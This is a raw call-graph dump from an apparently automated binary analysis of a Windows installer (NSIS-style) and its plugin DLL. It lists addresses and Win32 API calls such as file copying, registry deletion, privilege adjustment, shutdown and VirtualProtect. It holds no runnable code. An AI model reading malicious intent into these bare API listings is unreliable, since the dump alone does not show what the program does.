4159 4032a5 lstrlenA 4159->4156 4160 4032b4 4159->4160 4247 406385 GetModuleHandleA 4160->4247 4163 406385 5 API calls 4164 4032c2 4163->4164 4165 406385 5 API calls 4164->4165 4166 4032ce #17 OleInitialize SHGetFileInfoA 4165->4166 4253 405fed lstrcpynA 4166->4253 4169 40331a GetCommandLineA 4254 405fed lstrcpynA 4169->4254 4171 40332c 4172 4059b0 CharNextA 4171->4172 4173 403355 CharNextA 4172->4173 4182 403365 4173->4182 4174 40342f 4175 403442 GetTempPathA 4174->4175 4255 403217 4175->4255 4177 40345a 4178 4034b4 DeleteFileA 4177->4178 4179 40345e GetWindowsDirectoryA lstrcatA 4177->4179 4265 402dc4 GetTickCount GetModuleFileNameA 4178->4265 4181 403217 12 API calls 4179->4181 4180 4059b0 CharNextA 4180->4182 4184 40347a 4181->4184 4182->4174 4182->4180 4185 403431 4182->4185 4184->4178 4187 40347e GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4184->4187 4349 405fed lstrcpynA 4185->4349 4186 4034c8 4193 4059b0 CharNextA 4186->4193 4226 40354e 4186->4226 4239 40355e 4186->4239 4189 403217 12 API calls 4187->4189 4191 4034ac 4189->4191 4191->4178 4191->4239 4209 4034e3 4193->4209 4195 403696 4198 403718 ExitProcess 4195->4198 4199 40369e GetCurrentProcess OpenProcessToken 4195->4199 4196 403578 4373 405709 4196->4373 4204 4036e9 4199->4204 4205 4036b9 LookupPrivilegeValueA AdjustTokenPrivileges 4199->4205 4202 403529 4350 405a73 4202->4350 4203 40358e 4377 405674 4203->4377 4208 406385 5 API calls 4204->4208 4205->4204 4212 4036f0 4208->4212 4209->4202 4209->4203 4215 403705 ExitWindowsEx 4212->4215 4218 403711 4212->4218 4213 4035a4 lstrcatA 4214 4035af lstrcatA lstrcmpiA 4213->4214 4217 4035cb 4214->4217 4214->4239 4215->4198 4215->4218 4220 4035d0 4217->4220 4221 4035d7 4217->4221 4222 40140b 2 API calls 4218->4222 4219 403543 4365 405fed lstrcpynA 4219->4365 4380 4055da CreateDirectoryA 4220->4380 4385 405657 CreateDirectoryA 4221->4385 4222->4198 4293 40380a 4226->4293 4228 4035dc SetCurrentDirectoryA 4229 4035f6 4228->4229 4230 4035eb 4228->4230 4389 405fed lstrcpynA 4229->4389 4388 405fed lstrcpynA 4230->4388 4233 40600f 17 API calls 4234 403635 DeleteFileA 4233->4234 4235 403642 CopyFileA 4234->4235 4241 403604 4234->4241 4235->4241 4236 40368a 4237 405dcc 36 API calls 4236->4237 4237->4239 4366 403730 4239->4366 4240 40600f 17 API calls 4240->4241 4241->4233 4241->4236 4241->4240 4242 40568c 2 API calls 4241->4242 4243 403676 CloseHandle 4241->4243 4390 405dcc MoveFileExA 4241->4390 4242->4241 4243->4241 4245 406339 wsprintfA LoadLibraryExA 4244->4245 4245->4159 4248 4063a1 4247->4248 4249 4063ab GetProcAddress 4247->4249 4250 406317 3 API calls 4248->4250 4251 4032bb 4249->4251 4252 4063a7 4250->4252 4251->4163 4252->4249 4252->4251 4253->4169 4254->4171 4256 406257 5 API calls 4255->4256 4258 403223 4256->4258 4257 40322d 4257->4177 4258->4257 4394 405985 lstrlenA CharPrevA 4258->4394 4261 405657 2 API calls 4262 40323b 4261->4262 4263 405bb5 2 API calls 4262->4263 4264 403246 4263->4264 4264->4177 4397 405b86 GetFileAttributesA CreateFileA 4265->4397 4267 402e04 4285 402e14 4267->4285 4398 405fed lstrcpynA 4267->4398 4269 402e2a 4399 4059cc lstrlenA 4269->4399 4273 402e3b GetFileSize 4274 402f35 4273->4274 4287 402e52 4273->4287 4404 402d60 4274->4404 4276 402f3e 4278 402f6e GlobalAlloc 4276->4278 4276->4285 4439 403200 SetFilePointer 4276->4439 4415 403200 SetFilePointer 4278->4415 4280 402fa1 4282 402d60 6 API calls 4280->4282 4282->4285 4283 402f57 4286 4031ea ReadFile 4283->4286 4284 402f89 4416 402ffb 4284->4416 4285->4186 4289 402f62 4286->4289 4287->4274 4287->4280 4287->4285 4290 402d60 6 API calls 4287->4290 4436 4031ea 4287->4436 4289->4278 4289->4285 4290->4287 4291 402f95 4291->4285 4291->4291 4292 402fd2 SetFilePointer 4291->4292 4292->4285 4294 406385 5 API calls 4293->4294 4295 40381e 4294->4295 4296 403824 4295->4296 4297 403836 4295->4297 4460 405f4b wsprintfA 4296->4460 4298 405ed4 3 API calls 4297->4298 4299 403861 4298->4299 4301 40387f lstrcatA 4299->4301 4303 405ed4 3 API calls 4299->4303 4302 403834 4301->4302 4445 403acf 4302->4445 4303->4301 4306 405a73 18 API calls 4307 4038b1 4306->4307 4308 40393a 4307->4308 4310 405ed4 3 API calls 4307->4310 4309 405a73 18 API calls 4308->4309 4311 403940 4309->4311 4312 4038dd 4310->4312 4313 403950 LoadImageA 4311->4313 4314 40600f 17 API calls 4311->4314 4312->4308 4317 4038f9 lstrlenA 4312->4317 4320 4059b0 CharNextA 4312->4320 4315 4039f6 4313->4315 4316 403977 RegisterClassA 4313->4316 4314->4313 4319 40140b 2 API calls 4315->4319 4318 4039ad SystemParametersInfoA CreateWindowExA 4316->4318 4348 403a00 4316->4348 4321 403907 lstrcmpiA 4317->4321 4322 40392d 4317->4322 4318->4315 4323 4039fc 4319->4323 4325 4038f7 4320->4325 4321->4322 4326 403917 GetFileAttributesA 4321->4326 4324 405985 3 API calls 4322->4324 4327 403acf 18 API calls 4323->4327 4323->4348 4328 403933 4324->4328 4325->4317 4329 403923 4326->4329 4330 403a0d 4327->4330 4461 405fed lstrcpynA 4328->4461 4329->4322 4332 4059cc 2 API calls 4329->4332 4333 403a19 ShowWindow 4330->4333 4334 403a9c 4330->4334 4332->4322 4335 406317 3 API calls 4333->4335 4453 4051e6 OleInitialize 4334->4453 4338 403a31 4335->4338 4337 403aa2 4339 403aa6 4337->4339 4340 403abe 4337->4340 4341 403a3f GetClassInfoA 4338->4341 4343 406317 3 API calls 4338->4343 4346 40140b 2 API calls 4339->4346 4339->4348 4342 40140b 2 API calls 4340->4342 4344 403a53 GetClassInfoA RegisterClassA 4341->4344 4345 403a69 DialogBoxParamA 4341->4345 4342->4348 4343->4341 4344->4345 4347 40140b 2 API calls 4345->4347 4346->4348 4347->4348 4348->4239 4349->4175 4463 405fed lstrcpynA 4350->4463 4352 405a84 4464 405a1e CharNextA CharNextA 4352->4464 4355 403534 4355->4239 4364 405fed lstrcpynA 4355->4364 4356 406257 5 API calls 4359 405a9a 4356->4359 4357 405ac5 lstrlenA 4358 405ad0 4357->4358 4357->4359 4361 405985 3 API calls 4358->4361 4359->4355 4359->4357 4363 4059cc 2 API calls 4359->4363 4470 4062f0 FindFirstFileA 4359->4470 4362 405ad5 GetFileAttributesA 4361->4362 4362->4355 4363->4357 4364->4219 4365->4226 4367 403748 4366->4367 4368 40373a CloseHandle 4366->4368 4473 403775 4367->4473 4368->4367 4376 40571e 4373->4376 4374 403586 ExitProcess 4375 405732 MessageBoxIndirectA 4375->4374 4376->4374 4376->4375 4378 406385 5 API calls 4377->4378 4379 403593 lstrcatA 4378->4379 4379->4213 4379->4214 4381 4035d5 4380->4381 4382 40562b GetLastError 4380->4382 4381->4228 4382->4381 4383 40563a SetFileSecurityA 4382->4383 4383->4381 4384 405650 GetLastError 4383->4384 4384->4381 4386 405667 4385->4386 4387 40566b GetLastError 4385->4387 4386->4228 4387->4386 4388->4229 4389->4241 4391 405de0 4390->4391 4392 405ded 4390->4392 4527 405c5c 4391->4527 4392->4241 4395 403235 4394->4395 4396 40599f lstrcatA 4394->4396 4395->4261 4396->4395 4397->4267 4398->4269 4400 4059d9 4399->4400 4401 402e30 4400->4401 4402 4059de CharPrevA 4400->4402 4403 405fed lstrcpynA 4401->4403 4402->4400 4402->4401 4403->4273 4405 402d81 4404->4405 4406 402d69 4404->4406 4407 402d91 GetTickCount 4405->4407 4408 402d89 4405->4408 4409 402d72 DestroyWindow 4406->4409 4410 402d79 4406->4410 4412 402dc2 4407->4412 4413 402d9f CreateDialogParamA ShowWindow 4407->4413 4411 4063c1 2 API calls 4408->4411 4409->4410 4410->4276 4414 402d8f 4411->4414 4412->4276 4413->4412 4414->4276 4415->4284 4417 403011 4416->4417 4418 40303f 4417->4418 4442 403200 SetFilePointer 4417->4442 4420 4031ea ReadFile 4418->4420 4421 40304a 4420->4421 4422 403183 4421->4422 4423 40305c GetTickCount 4421->4423 4425 40316d 4421->4425 4424 4031c5 4422->4424 4429 403187 4422->4429 4423->4425 4432 403088 4423->4432 4427 4031ea ReadFile 4424->4427 4425->4291 4426 4031ea ReadFile 4426->4432 4427->4425 4428 4031ea ReadFile 4428->4429 4429->4425 4429->4428 4430 405c2d WriteFile 4429->4430 4430->4429 4431 4030de GetTickCount 4431->4432 4432->4425 4432->4426 4432->4431 4433 403103 MulDiv wsprintfA 4432->4433 4440 405c2d WriteFile 4432->4440 4434 405114 24 API calls 4433->4434 4434->4432 4443 405bfe ReadFile 4436->4443 4439->4283 4441 405c4b 4440->4441 4441->4432 4442->4418 4444 4031fd 4443->4444 4444->4287 4446 403ae3 4445->4446 4462 405f4b wsprintfA 4446->4462 4448 403b54 4449 403b88 18 API calls 4448->4449 4451 403b59 4449->4451 4450 40388f 4450->4306 4451->4450 4452 40600f 17 API calls 4451->4452 4452->4451 4454 4040c7 SendMessageA 4453->4454 4459 405209 4454->4459 4455 405230 4456 4040c7 SendMessageA 4455->4456 4457 405242 OleUninitialize 4456->4457 4457->4337 4458 401389 2 API calls 4458->4459 4459->4455 4459->4458 4460->4302 4461->4308 4462->4448 4463->4352 4465 405a39 4464->4465 4468 405a49 4464->4468 4466 405a44 CharNextA 4465->4466 4465->4468 4469 405a69 4466->4469 4467 4059b0 CharNextA 4467->4468 4468->4467 4468->4469 4469->4355 4469->4356 4471 406311 4470->4471 4472 406306 FindClose 4470->4472 4471->4359 4472->4471 4475 403783 4473->4475 4474 40374d 4477 4057b5 4474->4477 4475->4474 4476 403788 FreeLibrary GlobalFree 4475->4476 4476->4474 4476->4476 4478 405a73 18 API calls 4477->4478 4479 4057d5 4478->4479 4480 4057f4 4479->4480 4481 4057dd DeleteFileA 4479->4481 4493 405922 4480->4493 4514 405fed lstrcpynA 4480->4514 4484 403567 OleUninitialize 4481->4484 4483 40581a 4485 405820 lstrcatA 4483->4485 4486 40582d 4483->4486 4484->4195 4484->4196 4488 405833 4485->4488 4489 4059cc 2 API calls 4486->4489 4487 4062f0 2 API calls 4490 405946 4487->4490 4491 405841 lstrcatA 4488->4491 4492 40584c lstrlenA FindFirstFileA 4488->4492 4489->4488 4490->4484 4494 405985 3 API calls 4490->4494 4491->4492 4492->4493 4512 405870 4492->4512 4493->4484 4493->4487 4496 405950 4494->4496 4495 4059b0 CharNextA 4495->4512 4497 40576d 5 API calls 4496->4497 4498 40595c 4497->4498 4499 405960 4498->4499 4500 405976 4498->4500 4499->4484 4505 405114 24 API calls 4499->4505 4501 405114 24 API calls 4500->4501 4501->4484 4502 405901 FindNextFileA 4504 405919 FindClose 4502->4504 4502->4512 4504->4493 4506 40596d 4505->4506 4508 405dcc 36 API calls 4506->4508 4508->4484 4509 4057b5 60 API calls 4509->4512 4510 405114 24 API calls 4510->4502 4511 405114 24 API calls 4511->4512 4512->4495 4512->4502 4512->4509 4512->4510 4512->4511 4513 405dcc 36 API calls 4512->4513 4515 405fed lstrcpynA 4512->4515 4516 40576d 4512->4516 4513->4512 4514->4483 4515->4512 4524 405b61 GetFileAttributesA 4516->4524 4519 40579a 4519->4512 4520 405790 DeleteFileA 4522 405796 4520->4522 4521 405788 RemoveDirectoryA 4521->4522 4522->4519 4523 4057a6 SetFileAttributesA 4522->4523 4523->4519 4525 405779 4524->4525 4526 405b73 SetFileAttributesA 4524->4526 4525->4519 4525->4520 4525->4521 4526->4525 4528 405c82 4527->4528 4529 405ca8 GetShortPathNameA 4527->4529 4554 405b86 GetFileAttributesA CreateFileA 4528->4554 4531 405dc7 4529->4531 4532 405cbd 4529->4532 4531->4392 4532->4531 4534 405cc5 wsprintfA 4532->4534 4533 405c8c CloseHandle GetShortPathNameA 4533->4531 4535 405ca0 4533->4535 4536 40600f 17 API calls 4534->4536 4535->4529 4535->4531 4537 405ced 4536->4537 4555 405b86 GetFileAttributesA CreateFileA 4537->4555 4539 405cfa 4539->4531 4540 405d09 GetFileSize GlobalAlloc 4539->4540 4541 405dc0 CloseHandle 4540->4541 4542 405d2b 4540->4542 4541->4531 4543 405bfe ReadFile 4542->4543 4544 405d33 4543->4544 4544->4541 4556 405aeb lstrlenA 4544->4556 4547 405d4a lstrcpyA 4550 405d6c 4547->4550 4548 405d5e 4549 405aeb 4 API calls 4548->4549 4549->4550 4551 405da3 SetFilePointer 4550->4551 4552 405c2d WriteFile 4551->4552 4553 405db9 GlobalFree 4552->4553 4553->4541 4554->4533 4555->4539 4557 405b2c lstrlenA 4556->4557 4558 405b34 4557->4558 4559 405b05 lstrcmpiA 4557->4559 4558->4547 4558->4548 4559->4558 4560 405b23 CharNextA 4559->4560 4560->4557 5070 401fc8 5071 402b2c 17 API calls 5070->5071 5072 401fcf 5071->5072 5073 406385 5 API calls 5072->5073 5074 401fde 5073->5074 5075 401ff6 GlobalAlloc 5074->5075 5076 40205e 5074->5076 5075->5076 5077 40200a 5075->5077 5078 406385 5 API calls 5077->5078 5079 402011 5078->5079 5080 406385 5 API calls 5079->5080 5081 40201b 5080->5081 5081->5076 5085 405f4b wsprintfA 5081->5085 5083 402052 5086 405f4b wsprintfA 5083->5086 5085->5083 5086->5076 5087 4025c8 5088 402b2c 17 API calls 5087->5088 5089 4025cf 5088->5089 5092 405b86 GetFileAttributesA CreateFileA 5089->5092 5091 4025db 5092->5091 5093 4037c8 5094 4037d3 5093->5094 5095 4037da GlobalAlloc 5094->5095 5096 4037d7 5094->5096 5095->5096 4807 40254c 4808 402b6c 17 API calls 4807->4808 4809 402556 4808->4809 4810 402b0a 17 API calls 4809->4810 4811 40255f 4810->4811 4812 40256d 4811->4812 4815 402783 4811->4815 4813 402586 RegEnumValueA 4812->4813 4814 40257a RegEnumKeyA 4812->4814 4816 4025a2 RegCloseKey 4813->4816 4817 40259b 4813->4817 4814->4816 4816->4815 4817->4816 5100 6e3a1837 5102 6e3a185a 5100->5102 5101 6e3a189c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5104 6e3a1266 2 API calls 5101->5104 5102->5101 5103 6e3a188a GlobalFree 5102->5103 5103->5101 5105 6e3a1a1e GlobalFree GlobalFree 5104->5105 4854 405252 4855 405274 GetDlgItem GetDlgItem GetDlgItem 4854->4855 4856 4053fd 4854->4856 4900 4040b0 SendMessageA 4855->4900 4858 405405 GetDlgItem CreateThread CloseHandle 4856->4858 4859 40542d 4856->4859 4858->4859 4903 4051e6 5 API calls 4858->4903 4861 40545b 4859->4861 4862 405443 ShowWindow ShowWindow 4859->4862 4863 40547c 4859->4863 4860 4052e4 4866 4052eb GetClientRect GetSystemMetrics SendMessageA SendMessageA 4860->4866 4864 405463 4861->4864 4865 4054b6 4861->4865 4902 4040b0 SendMessageA 4862->4902 4870 4040e2 8 API calls 4863->4870 4868 40546b 4864->4868 4869 40548f ShowWindow 4864->4869 4865->4863 4876 4054c3 SendMessageA 4865->4876 4874 405359 4866->4874 4875 40533d SendMessageA SendMessageA 4866->4875 4877 404054 SendMessageA 4868->4877 4872 4054a1 4869->4872 4873 4054af 4869->4873 4871 405488 4870->4871 4878 405114 24 API calls 4872->4878 4879 404054 SendMessageA 4873->4879 4880 40536c 4874->4880 4881 40535e SendMessageA 4874->4881 4875->4874 4876->4871 4882 4054dc CreatePopupMenu 4876->4882 4877->4863 4878->4873 4879->4865 4884 40407b 18 API calls 4880->4884 4881->4880 4883 40600f 17 API calls 4882->4883 4885 4054ec AppendMenuA 4883->4885 4886 40537c 4884->4886 4887 40550a GetWindowRect 4885->4887 4888 40551d TrackPopupMenu 4885->4888 4889 405385 ShowWindow 4886->4889 4890 4053b9 GetDlgItem SendMessageA 4886->4890 4887->4888 4888->4871 4892 405539 4888->4892 4893 4053a8 4889->4893 4894 40539b ShowWindow 4889->4894 4890->4871 4891 4053e0 SendMessageA SendMessageA 4890->4891 4891->4871 4895 405558 SendMessageA 4892->4895 4901 4040b0 SendMessageA 4893->4901 4894->4893 4895->4895 4896 405575 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4895->4896 4898 405597 SendMessageA 4896->4898 4898->4898 4899 4055b9 GlobalUnlock SetClipboardData CloseClipboard 4898->4899 4899->4871 4900->4860 4901->4890 4902->4861 4910 4014d6 4911 402b0a 17 API calls 4910->4911 4912 4014dc Sleep 4911->4912 4914 4029b8 4912->4914 4915 401759 4916 402b2c 17 API calls 4915->4916 4917 401760 4916->4917 4918 401786 4917->4918 4919 40177e 4917->4919 4955 405fed lstrcpynA 4918->4955 4954 405fed lstrcpynA 4919->4954 4922 401784 4926 406257 5 API calls 4922->4926 4923 401791 4924 405985 3 API calls 4923->4924 4925 401797 lstrcatA 4924->4925 4925->4922 4931 4017a3 4926->4931 4927 4062f0 2 API calls 4927->4931 4928 405b61 2 API calls 4928->4931 4930 4017ba CompareFileTime 4930->4931 4931->4927 4931->4928 4931->4930 4932 40187e 4931->4932 4938 405fed lstrcpynA 4931->4938 4940 40600f 17 API calls 4931->4940 4947 405709 MessageBoxIndirectA 4931->4947 4950 401855 4931->4950 4953 405b86 GetFileAttributesA CreateFileA 4931->4953 4933 405114 24 API calls 4932->4933 4934 401888 4933->4934 4936 402ffb 31 API calls 4934->4936 4935 405114 24 API calls 4951 40186a 4935->4951 4937 40189b 4936->4937 4939 4018af SetFileTime 4937->4939 4941 4018c1 CloseHandle 4937->4941 4938->4931 4939->4941 4940->4931 4942 4018d2 4941->4942 4941->4951 4943 4018d7 4942->4943 4944 4018ea 4942->4944 4945 40600f 17 API calls 4943->4945 4946 40600f 17 API calls 4944->4946 4948 4018df lstrcatA 4945->4948 4949 4018f2 4946->4949 4947->4931 4948->4949 4949->4951 4952 405709 MessageBoxIndirectA 4949->4952 4950->4935 4950->4951 4952->4951 4953->4931 4954->4922 4955->4923 5106 401659 5107 402b2c 17 API calls 5106->5107 5108 40165f 5107->5108 5109 4062f0 2 API calls 5108->5109 5110 401665 5109->5110 5111 401959 5112 402b0a 17 API calls 5111->5112 5113 401960 5112->5113 5114 402b0a 17 API calls 5113->5114 5115 40196d 5114->5115 5116 402b2c 17 API calls 5115->5116 5117 401984 lstrlenA 5116->5117 5119 401994 5117->5119 5118 4019d4 5119->5118 5123 405fed lstrcpynA 5119->5123 5121 4019c4 5121->5118 5122 4019c9 lstrlenA 5121->5122 5122->5118 5123->5121 4956 4024da 4957 402b6c 17 API calls 4956->4957 4958 4024e4 4957->4958 4959 402b2c 17 API calls 4958->4959 4960 4024ed 4959->4960 4961 4024f7 RegQueryValueExA 4960->4961 4963 402783 4960->4963 4962 402517 4961->4962 4966 40251d RegCloseKey 4961->4966 4962->4966 4967 405f4b wsprintfA 4962->4967 4966->4963 4967->4966 5124 401cda 5125 402b0a 17 API calls 5124->5125 5126 401ce0 IsWindow 5125->5126 5127 401a0e 5126->5127 4968 6e3a2921 4969 6e3a2971 4968->4969 4970 6e3a2931 VirtualProtect 4968->4970 4970->4969 5128 402cdd 5129 402cec SetTimer 5128->5129 5131 402d05 5128->5131 5129->5131 5130 402d5a 5131->5130 5132 402d1f MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5131->5132 5132->5130 5133 401a5e 5134 402b0a 17 API calls 5133->5134 5135 401a67 5134->5135 5136 402b0a 17 API calls 5135->5136 5137 401a0e 5136->5137 5138 40485e 5139 40488a 5138->5139 5140 40486e 5138->5140 5142 404890 SHGetPathFromIDListA 5139->5142 5143 4048bd 5139->5143 5149 4056ed GetDlgItemTextA 5140->5149 5145 4048a0 5142->5145 5148 4048a7 SendMessageA 5142->5148 5144 40487b SendMessageA 5144->5139 5146 40140b 2 API calls 5145->5146 5146->5148 5148->5143 5149->5144 3942 402363 3943 40236b 3942->3943 3948 402371 3942->3948 3944 402b2c 17 API calls 3943->3944 3944->3948 3945 402b2c 17 API calls 3947 402381 3945->3947 3946 40238f 3952 402b2c 3946->3952 3947->3946 3949 402b2c 17 API calls 3947->3949 3948->3945 3948->3947 3949->3946 3953 402b38 3952->3953 3958 40600f 3953->3958 3956 402398 WritePrivateProfileStringA 3962 40601c 3958->3962 3959 40623e 3960 402b59 3959->3960 3991 405fed lstrcpynA 3959->3991 3960->3956 3975 406257 3960->3975 3962->3959 3963 406218 lstrlenA 3962->3963 3966 40600f 10 API calls 3962->3966 3967 406134 GetSystemDirectoryA 3962->3967 3969 406147 GetWindowsDirectoryA 3962->3969 3970 406257 5 API calls 3962->3970 3971 40617b SHGetSpecialFolderLocation 3962->3971 3972 40600f 10 API calls 3962->3972 3973 4061c1 lstrcatA 3962->3973 3984 405ed4 3962->3984 3989 405f4b wsprintfA 3962->3989 3990 405fed lstrcpynA 3962->3990 3963->3962 3966->3963 3967->3962 3969->3962 3970->3962 3971->3962 3974 406193 SHGetPathFromIDListA CoTaskMemFree 3971->3974 3972->3962 3973->3962 3974->3962 3982 406263 3975->3982 3976 4062cb 3977 4062cf CharPrevA 3976->3977 3979 4062ea 3976->3979 3977->3976 3978 4062c0 CharNextA 3978->3976 3978->3982 3979->3956 3981 4062ae CharNextA 3981->3982 3982->3976 3982->3978 3982->3981 3983 4062bb CharNextA 3982->3983 3996 4059b0 3982->3996 3983->3978 3992 405e73 3984->3992 3987 405f37 3987->3962 3988 405f08 RegQueryValueExA RegCloseKey 3988->3987 3989->3962 3990->3962 3991->3960 3993 405e82 3992->3993 3994 405e86 3993->3994 3995 405e8b RegOpenKeyExA 3993->3995 3994->3987 3994->3988 3995->3994 3997 4059b6 3996->3997 3998 4059c9 3997->3998 3999 4059bc CharNextA 3997->3999 3998->3982 3999->3997 5150 401563 5151 401596 ShowWindow 5150->5151 5152 401567 5150->5152 5151->5152 5154 402965 5151->5154 5155 405f4b wsprintfA 5152->5155 5155->5154 5156 401b63 5157 401b70 5156->5157 5158 401bb4 5156->5158 5159 40233b 5157->5159 5165 401b87 5157->5165 5160 401bb8 5158->5160 5161 401bdd GlobalAlloc 5158->5161 5162 40600f 17 API calls 5159->5162 5170 401bf8 5160->5170 5177 405fed lstrcpynA 5160->5177 5163 40600f 17 API calls 5161->5163 5164 402348 5162->5164 5163->5170 5164->5170 5171 405709 MessageBoxIndirectA 5164->5171 5175 405fed lstrcpynA 5165->5175 5168 401bca GlobalFree 5168->5170 5169 401b96 5176 405fed lstrcpynA 5169->5176 5171->5170 5173 401ba5 5178 405fed lstrcpynA 5173->5178 5175->5169 5176->5173 5177->5168 5178->5170 5179 402765 5180 402b2c 17 API calls 5179->5180 5181 40276c FindFirstFileA 5180->5181 5182 40278f 5181->5182 5185 40277f 5181->5185 5187 405f4b wsprintfA 5182->5187 5184 402796 5188 405fed lstrcpynA 5184->5188 5187->5184 5188->5185 5189 4041e6 5191 4041fc 5189->5191 5195 404308 5189->5195 5190 404377 5193 404441 5190->5193 5194 404381 GetDlgItem 5190->5194 5192 40407b 18 API calls 5191->5192 5196 404252 5192->5196 5200 4040e2 8 API calls 5193->5200 5197 404397 5194->5197 5198 4043ff 5194->5198 5195->5190 5195->5193 5201 40434c GetDlgItem SendMessageA 5195->5201 5199 40407b 18 API calls 5196->5199 5197->5198 5204 4043bd SendMessageA LoadCursorA SetCursor 5197->5204 5198->5193 5205 404411 5198->5205 5202 40425f CheckDlgButton 5199->5202 5203 40443c 5200->5203 5222 40409d KiUserCallbackDispatcher 5201->5222 5220 40409d KiUserCallbackDispatcher 5202->5220 5226 40448a 5204->5226 5210 404417 SendMessageA 5205->5210 5211 404428 5205->5211 5207 404372 5223 404466 5207->5223 5210->5211 5211->5203 5215 40442e SendMessageA 5211->5215 5213 40427d GetDlgItem 5221 4040b0 SendMessageA 5213->5221 5215->5203 5217 404293 SendMessageA 5218 4042b1 GetSysColor 5217->5218 5219 4042ba SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5217->5219 5218->5219 5219->5203 5220->5213 5221->5217 5222->5207 5224 404474 5223->5224 5225 404479 SendMessageA 5223->5225 5224->5225 5225->5190 5229 4056cf ShellExecuteExA 5226->5229 5228 4043f0 LoadCursorA SetCursor 5228->5198 5229->5228 4561 4023e8 4562 40241a 4561->4562 4563 4023ef 4561->4563 4565 402b2c 17 API calls 4562->4565 4573 402b6c 4563->4573 4567 402421 4565->4567 4578 402bea 4567->4578 4569 402400 4571 402b2c 17 API calls 4569->4571 4570 40242e 4572 402407 RegDeleteValueA RegCloseKey 4571->4572 4572->4570 4574 402b2c 17 API calls 4573->4574 4575 402b83 4574->4575 4576 405e73 RegOpenKeyExA 4575->4576 4577 4023f6 4576->4577 4577->4569 4577->4570 4579 402bf6 4578->4579 4580 402bfd 4578->4580 4579->4570 4580->4579 4582 402c2e 4580->4582 4583 405e73 RegOpenKeyExA 4582->4583 4584 402c5c 4583->4584 4585 402c82 RegEnumKeyA 4584->4585 4586 402c99 RegCloseKey 4584->4586 4587 402cba RegCloseKey 4584->4587 4589 402c2e 6 API calls 4584->4589 4592 402cad 4584->4592 4585->4584 4585->4586 4588 406385 5 API calls 4586->4588 4587->4592 4590 402ca9 4588->4590 4589->4584 4591 402cca RegDeleteKeyA 4590->4591 4590->4592 4591->4592 4592->4579 4593 40206a 4594 40212a 4593->4594 4595 40207c 4593->4595 4597 401423 24 API calls 4594->4597 4596 402b2c 17 API calls 4595->4596 4598 402083 4596->4598 4603 4022a9 4597->4603 4599 402b2c 17 API calls 4598->4599 4600 40208c 4599->4600 4601 4020a1 LoadLibraryExA 4600->4601 4602 402094 GetModuleHandleA 4600->4602 4601->4594 4604 4020b1 GetProcAddress 4601->4604 4602->4601 4602->4604 4605 4020c0 4604->4605 4606 4020fd 4604->4606 4607 4020c8 4605->4607 4608 4020df 4605->4608 4609 405114 24 API calls 4606->4609 4656 401423 4607->4656 4614 6e3a16db 4608->4614 4611 4020d0 4609->4611 4611->4603 4612 40211e FreeLibrary 4611->4612 4612->4603 4615 6e3a170b 4614->4615 4659 6e3a1a98 4615->4659 4617 6e3a1712 4618 6e3a1834 4617->4618 4619 6e3a172a 4617->4619 4620 6e3a1723 4617->4620 4618->4611 4691 6e3a22f1 4619->4691 4708 6e3a22af 4620->4708 4625 6e3a178e 4629 6e3a17dc 4625->4629 4630 6e3a1794 4625->4630 4626 6e3a1770 4721 6e3a24d8 4626->4721 4627 6e3a1759 4643 6e3a174f 4627->4643 4718 6e3a2cc3 4627->4718 4628 6e3a1740 4632 6e3a1746 4628->4632 4637 6e3a1751 4628->4637 4635 6e3a24d8 11 API calls 4629->4635 4740 6e3a156b 4630->4740 4632->4643 4702 6e3a2a38 4632->4702 4641 6e3a17cd 4635->4641 4636 6e3a1776 4732 6e3a1559 4636->4732 4712 6e3a26b2 4637->4712 4655 6e3a1823 4641->4655 4746 6e3a249e 4641->4746 4643->4625 4643->4626 4644 6e3a1757 4644->4643 4645 6e3a24d8 11 API calls 4645->4641 4648 6e3a182d GlobalFree 4648->4618 4652 6e3a180f 4652->4655 4750 6e3a14e2 wsprintfA 4652->4750 4654 6e3a1808 FreeLibrary 4654->4652 4655->4618 4655->4648 4657 405114 24 API calls 4656->4657 4658 401431 4657->4658 4658->4611 4753 6e3a1215 GlobalAlloc 4659->4753 4661 6e3a1abf 4754 6e3a1215 GlobalAlloc 4661->4754 4663 6e3a1d00 GlobalFree GlobalFree GlobalFree 4665 6e3a1d1d 4663->4665 4671 6e3a1d67 4663->4671 4664 6e3a1aca 4664->4663 4668 6e3a1bbd GlobalAlloc 4664->4668 4669 6e3a2033 4664->4669 4664->4671 4672 6e3a1c26 GlobalFree 4664->4672 4675 6e3a1c08 lstrcpyA 4664->4675 4676 6e3a1c12 lstrcpyA 4664->4676 4680 6e3a1fb7 4664->4680 4685 6e3a1ef9 GlobalFree 4664->4685 4686 6e3a1224 2 API calls 4664->4686 4755 6e3a1534 GlobalSize GlobalAlloc 4664->4755 4666 6e3a1d32 4665->4666 4667 6e3a20f1 4665->4667 4665->4671 4666->4671 4757 6e3a1224 4666->4757 4670 6e3a2113 GetModuleHandleA 4667->4670 4667->4671 4668->4664 4669->4671 4688 6e3a208c lstrcpyA 4669->4688 4673 6e3a2139 4670->4673 4674 6e3a2124 LoadLibraryA 4670->4674 4671->4617 4672->4664 4761 6e3a15c2 GetProcAddress 4673->4761 4674->4671 4674->4673 4675->4676 4676->4664 4678 6e3a218a 4678->4671 4683 6e3a2197 lstrlenA 4678->4683 4679 6e3a214b 4679->4678 4689 6e3a2174 GetProcAddress 4679->4689 4760 6e3a1215 GlobalAlloc 4680->4760 4762 6e3a15c2 GetProcAddress 4683->4762 4685->4664 4686->4664 4688->4671 4689->4678 4690 6e3a1fbf 4690->4617 4693 6e3a230a 4691->4693 4692 6e3a1224 GlobalAlloc lstrcpynA 4692->4693 4693->4692 4695 6e3a2446 GlobalFree 4693->4695 4696 6e3a23b8 GlobalAlloc MultiByteToWideChar 4693->4696 4701 6e3a2405 4693->4701 4764 6e3a12ad 4693->4764 4695->4693 4697 6e3a1730 4695->4697 4698 6e3a23e4 GlobalAlloc 4696->4698 4696->4701 4697->4627 4697->4628 4697->4643 4699 6e3a23fc GlobalFree 4698->4699 4699->4695 4701->4695 4768 6e3a2646 4701->4768 4704 6e3a2a4a 4702->4704 4703 6e3a2aef EnumWindows 4707 6e3a2b0d 4703->4707 4704->4703 4706 6e3a2bd9 4706->4643 4771 6e3a29e4 4707->4771 4709 6e3a22c4 4708->4709 4710 6e3a22cf GlobalAlloc 4709->4710 4711 6e3a1729 4709->4711 4710->4709 4711->4619 4716 